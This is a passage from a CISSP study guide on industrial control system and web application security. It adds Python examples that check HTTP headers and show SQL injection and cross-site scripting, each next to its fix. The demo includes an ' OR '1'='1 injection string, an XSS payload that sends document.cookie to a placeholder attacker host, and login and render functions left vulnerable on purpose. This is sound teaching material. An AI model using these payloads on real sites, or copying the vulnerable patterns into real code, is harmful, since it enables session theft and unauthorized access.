360 Chapter 9 ■ Security Vulnerabilities, Threats, and Countermeasures
PLC units are effectively single-purpose or focused-purpose digital computers. They are
typically deployed for the management and automation of various industrial electrome-
chanical operations, such as controlling systems on an assembly line or a large-scale digital
light display (such as a giant display system in a stadium or on a Las Vegas Strip marquee).
A SCADA system can operate as a stand-alone device, be networked together with
other SCADA systems, or be networked with traditional information technology (IT)
systems. Most SCADA systems are designed with minimal human interfaces. Often, they
use mechanical buttons and knobs or simple LCD screen interfaces (similar to what you
might have on a business printer or a GPS navigation device). However, networked SCADA
devices may have more complex remote-control software interfaces.
In theory, the static design of SCADA, PLC, and DCS units and their minimal human
interfaces should make the system fairly resistant to compromise or modification. Partly
for that reason, little security was built into these industrial control devices, especially in
the past. But there have been several well-known compromises of industrial control systems
in recent years; for example, Stuxnet, which targeted the PLCs controlling centrifuges at a
nuclear enrichment facility, delivered the first known rootkit for a PLC. Many SCADA
vendors have started implementing security improvements into their solutions in order to
prevent or at least reduce future compromises. However, in practice, SCADA and ICS
systems are still often poorly secured, vulnerable, and infrequently updated, and older
versions not designed for security are still in widespread use.
Assess and Mitigate Vulnerabilities in Web-Based Systems
There is a wide variety of application and system vulnerabilities and threats in web-based
systems, and the range is constantly expanding. Vulnerabilities include concerns related to
Extensible Markup Language (XML) and Security Assertion Markup Language (SAML),
plus many other concerns discussed by the open, community-focused web project known as
the Open Web Application Security Project (OWASP).
OWASP is a nonprofit security project focusing on improving security for online or
web-based applications. OWASP is not just an organization; it is also a large community
that works together to freely share information, methodology, tools, and techniques related
to better coding practices and more secure deployment architectures. For more information
on OWASP and to participate in the community, visit www.owasp.org. The OWASP
group maintains a guide of recommendations for assessing the security of a web service at
https://www.owasp.org/index.php/Web_Application_Security_Testing_Cheat_Sheet.
OWASP also maintains a top ten list of the most critical web application security risks at
https://www.owasp.org/images/7/72/OWASP_Top_10-2017_%28en%29.pdf.pdf. Both of
these documents would be a reasonable starting point for planning a security evaluation or
penetration test of an organization's web services.
Any security evaluation should start off with reconnaissance or information gathering.
This step is to collect as much information as possible about the target for later steps to use.
This usually includes viewing each of the hosted web pages, discovering the automation
technologies in use, looking for information that should not have been posted, and checking
for configuration and security leaks. This is followed by an assessment of the site's
configuration management (such as file handling, extensions in use, backups, and looking for
sensitive data in client-side code) and an evaluation of the site's transmission security (such as
checking which Secure Sockets Layer (SSL)/Transport Layer Security (TLS) versions are
supported, since SSL and TLS 1.0/1.1 are deprecated and should be disabled; assessing cipher
suites; reviewing cookie, session ID, and token management; and testing susceptibility to
forged requests).
Next in a web security assessment is to evaluate authentication and session management.
This is followed by evaluating the cryptography of the site and the methods used for data
validation and sanitization. A web security assessment should also involve checking for
DoS defenses, evaluating risk responses, and testing error handling.
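As an added example (not code from the book or from OWASP), the following script performs, offline, a few of the checks the assessment steps above describe: cookie and session-token attributes, missing transport-security headers, technology fingerprints in response headers, and sensitive data left in client-side code. It runs over a constructed HTTP response (the header values, cookie names, file paths and key string are all made up for the demonstration), together with a hardened version of the same page for contrast; the header names and cookie attributes it checks are standard, but the list of "session" cookie names is an assumption.

```python
"""Offline web-assessment checks over a constructed HTTP response.
Added example; not from the book or OWASP. The responses below are
constructed, not captured from any real site."""
import re

WEAK_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Server: Apache/2.4.29 (Ubuntu)\r\n"
    "X-Powered-By: PHP/7.2.24\r\n"
    "Set-Cookie: PHPSESSID=d41d8cd98f00b204e9800998ecf8427e; Path=/\r\n"
    "Set-Cookie: prefs=dark; Path=/; Secure; HttpOnly; SameSite=Lax\r\n"
    "Content-Type: text/html\r\n\r\n"
    "<html><head><title>Portal</title>\n"
    "<!-- TODO remove before launch: api_key = 'AKIAEXAMPLEKEY000000' -->\n"
    "<script src='/js/app.js'></script></head>\n"
    "<body><a href='/backup/site.zip'>old backup</a>\n"
    "<form method='post' action='/transfer'><input name='amount'></form>\n"
    "</body></html>"
)
# The same page served by a hardened configuration (also constructed).
HARDENED_RESPONSE = (
    "HTTP/1.1 200 OK\r\n"
    "Set-Cookie: PHPSESSID=d41d8cd98f00b204e9800998ecf8427e; Path=/; "
    "Secure; HttpOnly; SameSite=Strict\r\n"
    "Strict-Transport-Security: max-age=31536000; includeSubDomains\r\n"
    "Content-Security-Policy: default-src 'self'\r\n"
    "X-Content-Type-Options: nosniff\r\n\r\n"
    "<html><head><title>Portal</title><script src='/js/app.js'></script></head>"
    "<body><form method='post' action='/transfer'><input name='amount'></form>"
    "</body></html>"
)
# Assumed names under which common frameworks issue their session cookie.
SESSION_COOKIES = {"phpsessid", "jsessionid", "asp.net_sessionid", "sessionid", "session"}
REQUIRED_HEADERS = {
    "strict-transport-security": "no HSTS: clients can be downgraded to plaintext HTTP",
    "content-security-policy": "no CSP: nothing limits the damage of injected script",
    "x-content-type-options": "no X-Content-Type-Options: MIME sniffing allowed",
}
FINGERPRINT_HEADERS = ("server", "x-powered-by")
LEAK_PATTERNS = [
    (re.compile(r"<!--.*?-->", re.S), "HTML comment left in production page"),
    (re.compile(r"(?i)(api[_-]?key|secret|password)\s*[=:]\s*['\"][^'\"]+['\"]"),
     "credential-like literal in client-side code"),
    (re.compile(r"(?i)href=['\"][^'\"]*\.(zip|bak|old|sql|tar\.gz)['\"]"),
     "link to a backup or archive file"),
]


def parse_response(raw: str):
    """Split a raw HTTP response into a multi-valued header map (lower-cased
    names) and the body."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, _, value = line.partition(":")
        headers.setdefault(name.strip().lower(), []).append(value.strip())
    return headers, body


def assess(raw: str):
    """Return findings grouped by assessment area; empty lists mean clean."""
    headers, body = parse_response(raw)
    out = {"cookies": [], "headers": [], "fingerprints": [], "leaks": []}
    for cookie in headers.get("set-cookie", []):
        parts = [p.strip() for p in cookie.split(";")]
        name = parts[0].split("=", 1)[0]
        attrs = {p.split("=", 1)[0].lower() for p in parts[1:]}
        session = name.lower() in SESSION_COOKIES
        if "secure" not in attrs:
            out["cookies"].append(f"{name}: no Secure flag, cookie is sent over plaintext HTTP")
        if session and "httponly" not in attrs:
            out["cookies"].append(f"{name}: session cookie without HttpOnly, readable by injected script")
        if "samesite" not in attrs:
            out["cookies"].append(f"{name}: no SameSite attribute, weaker defence against forged requests")
    for name, message in REQUIRED_HEADERS.items():
        if name not in headers:
            out["headers"].append(message)
    for name in FINGERPRINT_HEADERS:
        for value in headers.get(name, []):
            out["fingerprints"].append(f"{name} header discloses {value}")
    for pattern, message in LEAK_PATTERNS:
        for match in pattern.finditer(body):
            out["leaks"].append(f"{message}: {match.group(0)[:60]}")
    return out


if __name__ == "__main__":
    for label, raw in (("weak", WEAK_RESPONSE), ("hardened", HARDENED_RESPONSE)):
        print(f"== {label} ==")
        for area, findings in assess(raw).items():
            for finding in findings:
                print(f"[{area}] {finding}")
```

Running the script lists eleven findings for the weak response (three on the session cookie, three missing headers, two fingerprints, three leaks in the HTML) and none for the hardened one. Against a live target the same checks would be run on the response to an HTTPS request, alongside a separate TLS scan for the version and cipher-suite items, which this offline example does not cover.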
This is only a brief overview of the concept of web security assessment, as the CISSP
exam does not expect you to be a professional penetration tester, but you should be gener-
ally aware of the concept of security evaluation. You are welcome to explore more details
about web security assessment from the OWASP guide if you find this topic interesting.
A few of the OWASP top ten web risks that you may want to know about are injection,
XML exploitation (notably XML external entity, or XXE, attacks), cross-site scripting (XSS),
and cross-site request forgery (XSRF, also written CSRF).
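Two of those risks, injection and XSS, are small enough to show in working code. The following is an added example, not code from the book or from OWASP: each risk appears as the vulnerable construction beside its fix, using an in-memory SQLite table whose accounts and attacker inputs are constructed for the demonstration.

```python
"""Injection and XSS: vulnerable form beside the fix. Added example, not
from the book; the users table, accounts and attacker inputs are constructed."""
import html
import sqlite3


def make_db() -> sqlite3.Connection:
    """In-memory database with two constructed accounts."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("alice", "s3cret"), ("bob", "hunter2")])
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Input is spliced into the statement text, so a quote in the input
    # changes the SQL grammar instead of staying a string value.
    query = (f"SELECT 1 FROM users WHERE username = '{username}' "
             f"AND password = '{password}'")
    return conn.execute(query).fetchone() is not None


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Bound parameters: the values travel separately from the statement and
    # are never parsed as SQL.
    row = conn.execute(
        "SELECT 1 FROM users WHERE username = ? AND password = ?",
        (username, password),
    ).fetchone()
    return row is not None


def render_vulnerable(comment: str) -> str:
    # Untrusted text is placed directly into HTML (reflected or stored XSS).
    return f"<p>{comment}</p>"


def render_safe(comment: str) -> str:
    # Output encoding for the HTML body context: <, >, &, and quotes become entities.
    return f"<p>{html.escape(comment, quote=True)}</p>"


# Constructed attacker inputs.
INJECTION_PASSWORD = "' OR '1'='1"
XSS_COMMENT = "<script>fetch('https://attacker.invalid/?c=' + document.cookie)</script>"

if __name__ == "__main__":
    db = make_db()
    # The spliced query becomes: ... AND password = '' OR '1'='1', which is
    # always true, so the vulnerable login succeeds without the password.
    print("vulnerable login with injected password:",
          login_vulnerable(db, "alice", INJECTION_PASSWORD))   # True
    print("parameterized login with the same input:",
          login_safe(db, "alice", INJECTION_PASSWORD))         # False
    print(render_vulnerable(XSS_COMMENT))
    print(render_safe(XSS_COMMENT))
```

The fix in both cases is the same idea: keep data and code apart. Parameterized queries hand the values to the database driver out of band, and output encoding turns markup characters into inert entities before they reach the browser; neither relies on trying to recognise and strip malicious input.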
An